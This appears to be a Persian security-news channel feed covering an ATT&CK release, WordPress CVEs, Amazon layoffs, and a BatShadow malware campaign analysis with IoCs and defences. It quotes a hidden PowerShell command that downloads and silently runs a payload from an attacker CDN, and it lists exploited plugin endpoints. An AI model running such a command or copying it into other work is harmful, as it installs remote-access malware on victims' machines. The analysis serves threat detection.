#MITRE ATT&CK v18 Release
October 2025

تغییرات کلیدی:
- بازنگری بخش دفاعی و جایگزینی «تشخیص (Detections)» با «راهکارهای تشخیص (Detection Strategies)»
- اضافه شدن شاخص‌های تحلیلی (Analytics) و اجزای داده (Data Components) جدید
- بازگردانی قابلیت «سوء‌استفاده از امکانات دسترس‌پذیری» (Abuse Accessibility Features) در بخش موبایل
- آمار کلی: ۹۱۰ مورد نرم‌افزار، ۱۷۶ گروه، ۵۵ کمپین ثبت شده در این نسخه

🔗 https://attack.mitre.org/resources/updates/updates-october-2025/

⭐️ @RadvanSec

🔴 آسیب پذیری با شناسه ی CVE-2025-11705 در افزونه ی وردپرسی Anti-Malware Security and Brute-Force Firewall کشف و اصلاح شده که امکان افشای اطلاعات رو به مهاجمی که عضو سایت (Subscriber) هستش، میده.

نسخه های تحت تاثیر: ۴.۲۳.۸۱ و قبل‌ تر
نسخه اصلاح شده: ۴.۲۳.۸۳

سایتهایی که از نسخه های آسیب پذیر استفاده میکنن و همچنین امکان عضویت داخلشون فعال هستش، تحت تاثیر آسیب پذیری هستن.

آسیب پذیری در تابع GOTMLS_ajax_scan هستش و امکان خوندن فایلهای دلخواه رو به مهاجم میده. مثلا مهاجم میتونه فایل wp-config.php رو بخونه.

#وردپرس #آسیب_پذیری_امنیتی
#worpress #CVE

🆔 @onhex_ir
➡️ ALL Link

⭐️ @RadvanSec

⭐️ @RadvanSec

https://medium.com/@Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015

⭐️ @RadvanSec

⭐️کابوس اخراج و حذف کارمندان و جایگزینی هوش مصنوعی

🔹هوش مصنوعی باعث حذف ۱۴ هزار شغل در یک شرکت آمازون
به نقل از رویترز،
🔹شرکت آمریکایی آمازون حدود ۱۴۰۰۰ شغل شرکتی را حذف خواهد کرد تا هزینه‌های خود را در بخش هوش مصنوعی افزایش دهد.

🔻بث گالتی، معاون ارشد بخش تجربه و فناوری کارکنان آمازون، ديروز سه‌شنبه در نامه‌ای به کارمندان نوشت که به اکثر کارمندان ۹۰ روز فرصت داده می‌شود تا به دنبال موقعیت شغلی جدیدی در داخل شرکت باشند. آمازون اخیرا اعلام کرد قصد دارد ۱۰ میلیارد دلار برای ساخت یک پردیس در کارولینای شمالی سرمایه‌گذاری کند تا زیرساخت‌های محاسبات ابری و هوش مصنوعی خود را گسترش دهد.

🔻دوستان به سمت حوزه AGI پیش برید.سعی کنید همسو با انقلاب صنعتی چهارم هرچه سریعتر پیش برید.☺️
با این شوک حذف کارمندان که در دنیا در حال گسترش هست و بیشتر بخاطر AGI هست.

https://learninghive.ir/%d9%87%d9%88%d8%b4-%d9%85%d8%b5%d9%86%d9%88%d8%b9%db%8c-%d8%b9%d9%85%d9%88%d9%85%db%8c-%db%8c%d8%a7-agi/

⭐️ @RadvanSec

اوضاع جالبی نیست 🗿

📃 طبق این گزارش مهاجم از یه فایل LNK مخرب برای اجرای یه دستور مخفی PowerShell استفاده کرده که یه سند PDF جعلی (lure) و یه فایل ZIP دیگه رو از آدرس Bunny CDN دانلود میکنه:

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { iwr 'hxxps://555555cnd.b-cdn[.]net/Marriott_Marketing_Job_Denoscription.pdf' -OutFile 'C:\Users\Public\Marriott.pdf'; Start-Process 'C:\Users\Public\Marriott.pdf'; Start-Sleep -Seconds 3; iwr 'hxxps://555555cnd.b-cdn[.]net/002.zip' -OutFile 'C:\Users\Public\002.zip'; Expand-Archive -Path 'C:\Users\Public\002.zip' -DestinationPath 'C:\Users\Public' -Force; Start-Process 'C:\Users\Public\XtraViewer.exe' -ArgumentList '/silent_start' } catch {}"

با وجود اینکه این دستور خیلی رایجه و به‌راحتی میشه کشفش کرد، استفاده از Bunny CDN جالب به نظر میرسه. و البته، ما میتونیم ازش برای شکار (hunting) استفاده کنیم:

event_type: "dnsreqwin"

AND

dns_rname: "b-cdn.net"

@TryHackBox
#LNKMalware #PowerShell #Malicious

خلاصه کوتاه

گروه تهدیدی که محققان آن را BatShadow نامیده‌اند، با یک کمپین هدفمند به دنبال جذب و آلوده‌سازی افراد شاغل در حوزه‌های دیجیتال (مثل جویندگان کار و دیجیتال مارکترها) است. آنها از مهندسی اجتماعیِ دقیق (آگهی‌های شغلی/لینک‌های جعلی) استفاده می‌کنند و فایل‌های ZIP حاوی اسناد طعمه و یک فایل مخفی .LNK یا .exe را به قربانی می‌رسانند. پس از اجرا، یک باینری نوشته‌شده با Go (که محققان آن را «Vampire bot» می‌نامند) نصب می‌شود و با ویژگی‌های زیر رفتار می‌کند:

شناسایی و پروفایل کامل میزبان (HWID، یوزرنیم، OS، آنتی‌ویروس‌های نصب‌شده، آی‌پی‌ها و غیره).

ارسال یک beacon اولیه رمزنگاری‌شده (JSON) به C2 با اطلاعات کامل.

گرفتن اسکرین‌شات‌های دوره‌ای (real-time desktop capture) با استفاده از کتابخانه‌ی Go (kbinani) و ذخیره به‌صورت WEBP.

رمزنگاری داده‌ها با AES-CBC (کلید از یک UUID سخت‌کدشده مشتق می‌شود) و فرستادن آنها داخل ترافیک HTTPS به سرورهای C2 (مثلاً endpointهایی مثل api3.samsungcareers.work/api/...).

یک حلقهٔ دائمی C2 برای دریافت دستورات (download/execute، تغییر تنظیمات captureInterval/captureQuality و …).

پنهان‌سازی و تداوم: کپی خود به مسیرهای مخفی (مثلاً داخل AppData\Local\Packages\edge)، ایجاد mutex و استفاده از ابزارهای قانونی مانند XtraViewer برای پنهان‌سازی کنترل از راه دور.

Aryaka Unified SASE Solution For Secure

نحوهٔ نفوذ و ترفندهای اجتماعی (لِیِر)

طعمه‌ها معمولاً با ZIP حاوی چند PDF و یک فایل LNK که شبیه PDF است فریب داده می‌شوند.

لینک‌های فیک به صفحات شغلی جعلی هدایت می‌کنند که قربانی را ترغیب می‌کنند فایل را «در Edge» باز کند — این ترفند برای دورزدن جلوگیری‌گرهای مرورگر انجام می‌شود.

بعد از کلیک، payload از CDN دانلود و اجرا می‌شود.

Aryaka Unified SASE Solution For Secure

تکنیک‌های فنی برجسته

زبان Go برای ساخت باینری (cross-platform، سخت‌تر برای آنتی‌ویروس‌ها).

AES-CBC با کلید مشتق‌شده از UUID سخت‌کدشده؛ انتقال در قالب JSON با IV+ciphertext هِگز‌شده.

تصاویر WEBP برای اسکرین‌شات‌ها (حجم کم، مخفی‌سازی بهتر).

C2 over HTTPS با هدر X-Api-Key که همان UUID است — ترافیک شبیه ترافیک معمول HTTPS به‌نظر می‌رسد.

Aryaka Unified SASE Solution For Secure

شاخص‌های سازش (IoC) — نمونه‌ها (از گزارش)

نام‌‌‌های فایل/ZIP مانند: ATG_Technology_Group_Marketing_Job_Denoscription.zip, Marriott_Marketing_Job_Denoscription.zip

دامنه/USB: نمونه endpoint ذکرشده: api3.samsungcareers.work (در گزارش به‌عنوان مقصد C2).

رفتار قابل شناسایی: فرایندهایی که فایل exe را داخل پوشهٔ AppData\Local\Packages\edge ایجاد می‌کنند؛ mutex با نام edge; ترافیک HTTPS با JSON payload حاوی فیلدهای fingerprint.
(برای استخراج کامل IoCها می‌تونم Appendix A در PDF را دقیقاً بیرون بکشم و لیست کامل ارائه کنم).
Aryaka Unified SASE Solution For Secure

تطابق با MITRE ATT&CK (خلاصه)

چند تکنیک اصلی که در گزارش ذکر شده با ماتریکس ATT&CK مطابقت دارد:

Initial Access: Phishing / Spearphishing Attachment (T1566.001)

Execution: User Execution via LNK/EXE (T1204)

Persistence: Masquerading, Service/Startup persistence (T1036, T1547)

Collection: Screen Capture (T1113), System Information Discovery (T1082)

Command and Control: Application Layer Protocol over HTTPS (T1071.001)

Exfiltration: Exfil over C2 channel (T1041)
(گزارش Appendix B نقشهٔ کامل‌تری دارد).
Aryaka Unified SASE Solution For Secure

توصیه‌های دفاعی عملی (عملی و سریع)

کاربر را آموزش بدهید — هشدار دربارهٔ ZIP/PDFهای شغلی و فایل‌های LNK که شبیه PDF نمایش داده می‌شوند.

بلاک کردن و مانیتورینگ دامنه‌ها/CDNهای مشکوک ذکرشده در IoC.

جلوگیری از اجرای فایل‌های LNK از پوشه‌های دانلود/عمومی با سیاست‌های AppLocker/Windows Defender Application Control.

محدودیت استفاده از ابزارهای remote-access (مثل XtraViewer) یا اعمال سیاست MFA، whitelisting و مانیتورینگ نشست‌ها.

EDR/AV را تنظیم کنید تا رفتارهای مشکوک (کپی به AppData\Local\Packages\edge، ساخت mutex، استفاده از کتابخانه kbinani برای اسکرین‌شات) را شناسایی کند.

TLS inspection / proxy برای شناسایی الگوهای JSON مشکوک و X-Api-Keyها (در محیط‌های مجاز)؛ یا لااقل شبکه‌های خروجی را به سرورهای غیرضروری محدود کنید.

بکاپ آفلاین و رمزگذاری دیسک و حفظ دسترسی‌های SSH/credential امن.

⭐️ @RadvanSec

هکرها طی دو روز، ۸.۷ میلیون سایت وردپرسی را هک کردند — حمله از طریق آسیب‌پذیری‌های بحرانی در افزونه‌های محبوب انجام شده است
🗓 تاریخ: ۲۶ اکتبر ۲۰۲۵ | منبع: SecurityLab

یک کارزار بزرگِ سوءاستفاده از آسیب‌پذیری‌ها، سایت‌های وردپرسی را هدف قرار داده است. مهاجمان به سایت‌هایی حمله می‌کنند که افزونه‌های GutenKit و Hunk Companion روی آن‌ها نصب شده است. این افزونه‌ها دارای باگ‌های بحرانی هستند که امکان اجرای کد دلخواه روی سرور (Remote Code Execution) را فراهم می‌کنند.
شرکت Wordfence (متخصص در حفاظت از سایت‌های وردپرسی) اعلام کرده که تنها در دو روز — ۸ و ۹ اکتبر — بیش از ۸.۷ میلیون حمله ثبت شده است.

جزئیات آسیب‌پذیری‌ها

این حملات از سه آسیب‌پذیری با شناسه‌های زیر سوءاستفاده می‌کنند:

CVE-2024-9234

CVE-2024-9707

CVE-2024-11972

تمامی این آسیب‌پذیری‌ها دارای بالاترین سطح خطر (CVSS 9.8) هستند.

🔹 CVE-2024-9234 در افزونه GutenKit (با بیش از ۴۰ هزار نصب فعال) کشف شده است.
این نقص در بخش REST endpoint افزونه قرار دارد و به مهاجم اجازه می‌دهد بدون هیچ مجوزی، افزونه‌های دلخواه خود را از راه دور نصب کند.

🔹 دو مورد دیگر، یعنی CVE-2024-9707 و CVE-2024-11972، در افزونه Hunk Companion (نصب‌شده روی حدود ۸۰۰۰ سایت) وجود دارند.
در این دو آسیب‌پذیری نیز بررسی سطح دسترسی انجام نمی‌شود؛ در نتیجه مهاجم می‌تواند هر افزونه‌ای، حتی افزونه حاوی بدافزار را نصب کند.
پس از نصب افزونه مخرب، مهاجم می‌تواند دستورات دلخواه را روی سرور اجرا کرده و به اجرای کد از راه دور (RCE) دست یابد.

نسخه‌های آسیب‌پذیر

GutenKit: نسخه‌های ۲.۱.۰ و قبل از آن آسیب‌پذیرند.

Hunk Companion: نسخه‌های ۱.۸.۴ و ۱.۸.۵ (و تمام نسخه‌های قبل از آن) دارای نقص هستند.

رفع باگ‌ها مدت‌ها قبل منتشر شده است:

در GutenKit 2.1.1 (اکتبر ۲۰۲۴)

در Hunk Companion 1.9.0 (دسامبر ۲۰۲۴)
اما بسیاری از سایت‌ها هنوز از نسخه‌های قدیمی و آسیب‌پذیر استفاده می‌کنند.

نحوه حمله

طبق گزارش Wordfence، مهاجمان در GitHub آرشیوی به نام up.zip منتشر کرده‌اند که حاوی یک افزونه جعلی است.
درون این فایل، اسکریپت‌های رمزگذاری‌شده‌ای وجود دارد که قابلیت‌های زیر را دارند:

دانلود، حذف یا ویرایش فایل‌ها

مدیریت سطح دسترسی کاربران

یکی از فایل‌های موجود در این بسته، با رمز محافظت شده و در ظاهر شبیه به افزونه‌ی All in SEO است؛ اما در واقع برای ورود خودکار به حساب کاربری ادمین استفاده می‌شود.

پس از نصب این افزونه، مهاجمان دسترسی دائمی به سایت پیدا می‌کنند و می‌توانند:

داده‌ها را سرقت یا دانلود کنند

دستورات سیستم را اجرا کنند

یا اطلاعات خصوصی پردازش‌شده توسط سایت را ردیابی کنند

در صورتی که موفق به نصب بک‌دور کامل نشوند، از افزونه دیگری به نام wp-query-console استفاده می‌کنند که خود دارای آسیب‌پذیری اجرای کد بدون نیاز به احراز هویت است.

علائم آلودگی

Wordfence فهرستی از آدرس‌های IP منتشر کرده است که منبع اصلی این درخواست‌های مخرب هستند (برای فیلتر کردن در سطح سرور قابل استفاده‌اند).
همچنین، کارشناسان پیشنهاد می‌کنند در لاگ‌ها به دنبال درخواست‌های زیر بگردید:

/wp-json/gutenkit/v1/install-active-plugin
/wp-json/hc/v1/themehunk-import

و همچنین پوشه‌های زیر را بررسی کنید:

/up
/background-image-cropper
/ultra-seo-processor-wp
/oke
/wp-query-console

وجود فایل‌های ناشناس در این مسیرها می‌تواند نشانه هک بودن سایت باشد.

منبع خبر : https://www.securitylab.ru/news/565109.php

⭐️ @RadvanSec

⭐️ @RadvanSec

ابزار «SalesQL» یک سرویس آنلاین برای پیدا کردن، استخراج و تأیید اطلاعات تماس (ایمیل، تلفن و …) از شبکه حرفه‌ای LinkedIn و سایر منابع است.
salesql.com

⭐️ @RadvanSec